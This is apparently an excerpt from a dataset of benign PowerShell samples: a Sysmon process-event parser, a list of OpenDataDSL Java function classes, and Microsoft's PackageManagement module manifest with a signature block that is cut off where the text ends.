$BackTime=(Get-Date) - (New-TimeSpan -Minutes $BackMins)
$RawEvents = Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Where-Object {$_.TimeCreated -ge $BackTime} | Where-Object { $_.Id -eq 1}
$RawEvents | ForEach-Object {
$PropertyBag = @{
HostName = $_.MachineName
Version=$_.Version
EventType = $_.Message.Split(":")[0]
EventID = $_.Id
DateUTC = Get-Date ($_.Properties[0].Value) -format s
ProcessGuid = $_.Properties[1].Value
ProcessId = $_.Properties[2].Value
Image = $_.Properties[3].Value
CommandLine = $_.Properties[4].Value
CurrentDirectory = $_.Properties[5].Value
User = $_.Properties[6].Value
LogonGuid = $_.Properties[7].Value
LogonId = $_.Properties[8].Value
TerminalSessionId = $_.Properties[9].Value
IntegrityLevel = $_.Properties[10].Value
MD5 = ($_.Properties[11].Value.Split(",")[1].split("=")[1])
SHA1 = ($_.Properties[11].Value.Split(",")[0].split("=")[1])
SHA256 = ($_.Properties[11].Value.Split(",")[2].split("=")[1])
ParentProcessGuid = $_.Properties[12].Value
ParentProcessId = $_.Properties[13].Value
ParentImage = $_.Properties[14].Value
ParentCommandLine = $_.Properties[15].Value
}
$Output = New-Object -TypeName PSCustomObject -Property $PropertyBag
$Output | Select-Object DateUTC, HostName, Version, EventID, EventType, ProcessGuid, ProcessId, Image, CommandLine, MD5,SHA1, SHA256, CurrentDirectory, User, LogonGuid, LogonId, TerminalSessionId, IntegrityLevel, ParentProcessGuid, ParentProcessId, ParentImage, ParentCommandLine
}
|
combined_dataset/train/non-malicious/sample_56_70.ps1
|
sample_56_70.ps1
|
com.opendatadsl.function.DateFunctions
com.opendatadsl.function.StringFunctions
com.opendatadsl.function.GeneralFunctions
com.opendatadsl.function.TestFunctions
com.opendatadsl.function.IntrospectionFunctions
com.opendatadsl.function.BeanConstructors
com.opendatadsl.function.Constructors
com.opendatadsl.function.GeoConstructors
com.opendatadsl.function.ConversionFunctions
com.opendatadsl.function.math.StatisticsFunctions
com.opendatadsl.function.math.DataGeneration
com.opendatadsl.function.CurveFunctions
com.opendatadsl.function.LoaderFunctions
com.opendatadsl.function.interpolation.CurveInterpolation
com.opendatadsl.function.interpolation.TimeseriesInterpolation
com.opendatadsl.function.quality.Validation
com.opendatadsl.function.TimeSeriesScaling
com.opendatadsl.function.TimeSeriesFunctions
com.opendatadsl.function.NumericFunctions
com.opendatadsl.function.MatrixFunctions
com.opendatadsl.function.vollib.OptionsFunctions
com.opendatadsl.function.dataset.DatasetMonitoringFunctions
|
combined_dataset/train/non-malicious/sample_56_90.ps1
|
sample_56_90.ps1
|
###
# ==++==
#
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###
@{
GUID = "4ae9fd46-338a-459c-8186-07f910774cb8"
Author = "Microsoft Corporation"
CompanyName = "Microsoft Corporation"
Copyright = "(C) Microsoft Corporation. All rights reserved."
HelpInfoUri = "https://go.microsoft.com/fwlink/?linkid=2113634"
ModuleVersion = "1.4.7"
PowerShellVersion = "3.0"
ClrVersion = "4.0"
RootModule = "PackageManagement.psm1"
Description = 'PackageManagement (a.k.a. OneGet) is a new way to discover and install software packages from around the web.
It is a manager or multiplexor of existing package managers (also called package providers) that unifies Windows package management with a single Windows PowerShell interface. With PackageManagement, you can do the following.
- Manage a list of software repositories in which packages can be searched, acquired and installed
- Discover software packages
- Seamlessly install, uninstall, and inventory packages from one or more software repositories'
CmdletsToExport = @(
'Find-Package',
'Get-Package',
'Get-PackageProvider',
'Get-PackageSource',
'Install-Package',
'Import-PackageProvider'
'Find-PackageProvider'
'Install-PackageProvider'
'Register-PackageSource',
'Set-PackageSource',
'Unregister-PackageSource',
'Uninstall-Package'
'Save-Package'
)
FormatsToProcess = @('PackageManagement.format.ps1xml')
PrivateData = @{
PSData = @{
Tags = @('PackageManagement', 'PSEdition_Core', 'PSEdition_Desktop', 'Linux', 'Mac')
ProjectUri = 'https://oneget.org'
ReleaseNotes = @'
## 1.4.7
- Update security protocol to use TLS 1.2
- Remove catalog file
## 1.4.6
- Update `HelpInfoUri` to point to the latest content
## 1.4.5
- Bug fix for deadlock when getting parameters in an event
## 1.4.4
- Bug fix when installing modules from private feeds
## 1.4.3
- Another bug fix when registering repositories with PowerShellGet
## 1.4.2
- Bug fix for passing credentials from PowerShellGet when registering repositories
## 1.4.1
- Bug fix for using credential provider installed in Visual Studio
## 1.4
- Allow credential persistance for registering private repositories and finding or installing packages from those repositories
## 1.3.2
- Enable bootstrap on PSCore
- Bug fix to run on .NET Core 3.0
## 1.3.1
- Targets net452 and netstandard2.0 instead of net451, netcoreapp2.0, and netstandard1.6
## Previous releases are not included in this Changelog
'@
}
}
}
# SIG # Begin signature block
# MIIoPAYJKoZIhvcNAQcCoIIoLTCCKCkCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBP9n3G7bdSpE5h
# J/Oc1Iej8Q4fRkrX87jyHuPfR6VtxqCCDYUwggYDMIID66ADAgECAhMzAAADri01
# UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG
# yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899
# QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82
# 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV
# M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd
# WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W
# 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY
# 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV
# APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37
# ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57
# xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t
# Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i
# 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk
# 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK
# 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO
# zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA
# A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIA4k
# xD+2FDAG9XP+YiiD5zEnQ+mKUKm4YO/Z9W0WTGxCMEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAL6EXsm8i6ShwyeiwDYDFJ2rUvx/OEHhyiePO
# UsDiwIYJzBvMvUEORHB9gxfKD+fYLd7mT7jsI5psZkq0vpOqxrJgYJfpvrqeL15X
# 5ggsbhjSePN6dMKe9mkFNwLyzv7uGfr4zpqFvHH9e6xvWRBA6SjH9sBNTuiyLpru
# MW/hf9PuLbi3sc0HtcVxwn2yd7QNEqpdSf5IjgDGdPJKrMFg3D3a2fGh5Hd3GMht
# L0h7mrE2+bqsb13LBKWWDOzP6U1679YKctz0Gjwwmyvo6rUGjc8RSON3N4hY1FcM
# zA8mFC4i6PB0YeYf0M/dCWRh2maZAScX9nYshlKoBKW6vQy6xqGCF5cwgheTBgor
# BgEEAYI3AwMBMYIXgzCCF38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCDD6zloAIdlSZ81+Z3KZHQzZQWLAU2ZbPtG
# mwl8guzaWwIGZmsEWiKoGBMyMDI0MDcxMTIxMjQyOS45MzNaMASAAgH0oIHRpIHO
# MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL
# ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk
# IFRTUyBFU046REMwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l
# LVN0YW1wIFNlcnZpY2WgghHtMIIHIDCCBQigAwIBAgITMwAAAehQsIDPK3KZTQAB
# AAAB6DANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
# MDAeFw0yMzEyMDYxODQ1MjJaFw0yNTAzMDUxODQ1MjJaMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046REMwMC0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw
# ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDhQXdE0WzXG7wzeC9SGdH6
# eVwdGlF6YgpU7weOFBkpW9yuEmJSDE1ADBx/0DTuRBaplSD8CR1QqyQmxRDD/Cdv
# DyeZFAcZ6l2+nlMssmZyC8TPt1GTWAUt3GXUU6g0F0tIrFNLgofCjOvm3G0j482V
# utKS4wZT6bNVnBVsChr2AjmVbGDN/6Qs/EqakL5cwpGel1te7UO13dUwaPjOy0Wi
# 1qYNmR8i7T1luj2JdFdfZhMPyqyq/NDnZuONSbj8FM5xKBoar12ragC8/1CXaL1O
# MXBwGaRoJTYtksi9njuq4wDkcAwitCZ5BtQ2NqPZ0lLiQB7O10Bm9zpHWn9x1/Hm
# dAn4koMWKUDwH5sd/zDu4vi887FWxm54kkWNvk8FeQ7ZZ0Q5gqGKW4g6revV2IdA
# xBobWdorqwvzqL70WdsgDU/P5c0L8vYIskUJZedCGHM2hHIsNRyw9EFoSolDM+yC
# edkz69787s8nIp55icLfDoKw5hak5G6MWF6d71tcNzV9+v9RQKMa6Uwfyquredd5
# sqXWCXv++hek4A15WybIc6ufT0ilazKYZvDvoaswgjP0SeLW7mvmcw0FELzF1/uW
# aXElLHOXIlieKF2i/YzQ6U50K9dbhnMaDcJSsG0hXLRTy/LQbsOD0hw7FuK0nmzo
# tSx/5fo9g7fCzoFjk3tDEwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFPo5W8o980kM
# fRVQba6T34HwelLaMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G
# A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv
# Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs
# BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0
# LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy
# MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH
# AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCWfcJm2rwXtPi7
# 4km6PKAkni9+BWotq+QtDGgeT5F3ro7PsIUNKRkUytuGqI8thL3Jcrb03x6DOppY
# JEA+pb6o2qPjFddO1TLqvSXrYm+OgCLL+7+3FmRmfkRu8rHvprab0O19wDbukgO8
# I5Oi1RegMJl8t5k/UtE0Wb3zAlOHnCjLGSzP/Do3ptwhXokk02IvD7SZEBbPboGb
# tw4LCHsT2pFakpGOBh+ISUMXBf835CuVNfddwxmyGvNSzyEyEk5h1Vh7tpwP7z7r
# J+HsiP4sdqBjj6Avopuf4rxUAfrEbV6aj8twFs7WVHNiIgrHNna/55kyrAG9Yt19
# CPvkUwxYK0uZvPl2WC39nfc0jOTjivC7s/IUozE4tfy3JNkyQ1cNtvZftiX3j5Dt
# +eLOeuGDjvhJvYMIEkpkV68XLNH7+ZBfYa+PmfRYaoFFHCJKEoRSZ3PbDJPBiEhZ
# 9yuxMddoMMQ19Tkyftot6Ez0XhSmwjYBq39DvBFWhlyDGBhrU3GteDWiVd9YGSB2
# WnxuFMy5fbAK6o8PWz8QRMiptXHK3HDBr2wWWEcrrgcTuHZIJTqepNoYlx9VRFvj
# /vCXaAFcmkW1nk7VE+owaXr5RJjryDq9ubkyDq1mdrF/geaRALXcNZbfNXIkhXzX
# A6a8CiamcQW/DgmLJpiVQNriZYCHIDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb
# SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI
# EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv
# ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj
# YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy
# NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT
# B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE
# AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI
# yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo
# YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y
# aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v
# 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG
# ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS
# kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr
# bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM
# jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL
# W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF
# emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu
# rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE
# FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn
# G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW
# M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5
# Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi
# AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV
# 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js
# Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx
# MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2
# LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv
# 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn
# OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1
# bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4
# rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU
# 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF
# NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/
# HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU
# CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi
# excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm
# dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq
# ELQdVTNYs6FwZvKhggNQMIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp
# Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkRDMDAtMDVF
# MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK
# AQEwBwYFKw4DAhoDFQCMJG4vg0juMOVn2BuKACUvP80FuqCBgzCBgKR+MHwxCzAJ
# BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k
# MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv
# c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6jpqijAi
# GA8yMDI0MDcxMTE0MjgyNloYDzIwMjQwNzEyMTQyODI2WjB3MD0GCisGAQQBhFkK
# BAExLzAtMAoCBQDqOmqKAgEAMAoCAQACAgGlAgH/MAcCAQACAhSWMAoCBQDqO7wK
# AgEAMDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSCh
# CjAIAgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAA18VeLvfkzTFP8JMYaWtUDL
# iqaNUEfCY5Oghg0WoIjGfMzfIDcDy2KgwrA8LlJJuv/IjGKibYsSe2hhmCW3vh+f
# aA2gRIFU50RENHiu1LizIA4DcnLG4e87jBPuo3oknSei3HLt+3rji0+HWibNhh4v
# NKpt4T+MG6scVwGG0hyiS9ZDe7dyH32csVOmSpZX5FnnLdP0WIVFJd0nWuw49iWg
# K4rZaWTR3N7KxFe1TgqQ+UysmRRj9qa3+W2PsH0CCiZ5Av2JSncegQjsUcxyfehu
# EA2jRx+PAhpBRAGBww1E0KUOfdPP2cXF9arTSWI9Y7w9Ifghv/gsgOcd6M8U7bcx
# ggQNMIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3Rv
# bjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0
# aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAA
